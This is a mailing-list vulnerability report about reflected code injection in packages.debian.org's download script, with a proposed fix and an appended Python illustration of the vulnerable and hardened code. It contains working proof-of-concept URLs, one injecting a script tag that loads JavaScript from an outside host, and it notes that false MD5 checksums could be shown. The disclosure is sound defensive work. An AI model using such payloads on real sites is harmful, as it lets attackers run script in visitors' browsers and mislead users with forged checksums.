
code injection in packages.debian.org



Hello,

    [please CC me in replies, I'm not subscribed]

it's easy to do some code injection in packages.debian.org:

http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked&arch=i386&type=main

Credits go to fefe (http://blog.fefe.de/?ts=bb838974) for finding this.


Even better:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked<script%20src="http://www.cboltz.de/tmp/alert.js";></script>&arch=i386&type=main

Or my personal favorite:
http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=d41d8cd98f00b204e9800998ecf8427e<p>Powered%20by%20<img%20src="http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png";>&arch=i386&type=main
*SCNR*

One could also "just" inject wrong MD5SUMs easily...

Proposed solution:
Please read the MD5SUM from a file or database instead of a URL parameter ;-)


Regards,

Christian Boltz
-- 
Fontlinge developer
Fontlinge - font management for Linux / Schriftenverwaltung für Linux
Info and download: http://www.gesindel.de
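The reflected-parameter bug described in the mail, next to the proposed fix, as an added Python illustration that is not the original download.pl (a Perl CGI) and is not part of this message; the trusted checksum table and its value are constructed placeholders, not dietlibc's real MD5.

```python
import html
from urllib.parse import parse_qs

# Constructed stand-in for the file/database the report proposes as the
# checksum source. The value is a placeholder, not a real package checksum.
TRUSTED_MD5 = {
    "pool/main/d/dietlibc/dietlibc_0.28-3_i386.deb":
        "00000000000000000000000000000000",
}


def render_vulnerable(query_string: str) -> str:
    """The bug: the client-supplied md5sum parameter is written into the
    HTML page verbatim, so markup in it becomes part of the page and a
    wrong checksum is shown as if it were authoritative."""
    params = parse_qs(query_string)
    filename = params.get("file", [""])[0]
    md5sum = params.get("md5sum", [""])[0]
    return f"<p>File: {filename}</p><p>MD5 checksum: {md5sum}</p>"


def render_hardened(query_string: str) -> str:
    """The fix: look the checksum up server-side by file name (the md5sum
    parameter is ignored entirely) and HTML-escape everything rendered."""
    params = parse_qs(query_string)
    filename = params.get("file", [""])[0]
    md5sum = TRUSTED_MD5.get(filename)
    if md5sum is None:
        # Unknown file: do not echo anything the client sent.
        return "<p>Unknown file.</p>"
    return (f"<p>File: {html.escape(filename)}</p>"
            f"<p>MD5 checksum: {html.escape(md5sum)}</p>")


def is_reflected(query_string: str, marker: str, renderer) -> bool:
    """Regression check for a test suite: True if the raw marker from the
    query string shows up unescaped in the rendered page."""
    return marker in renderer(query_string)
```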
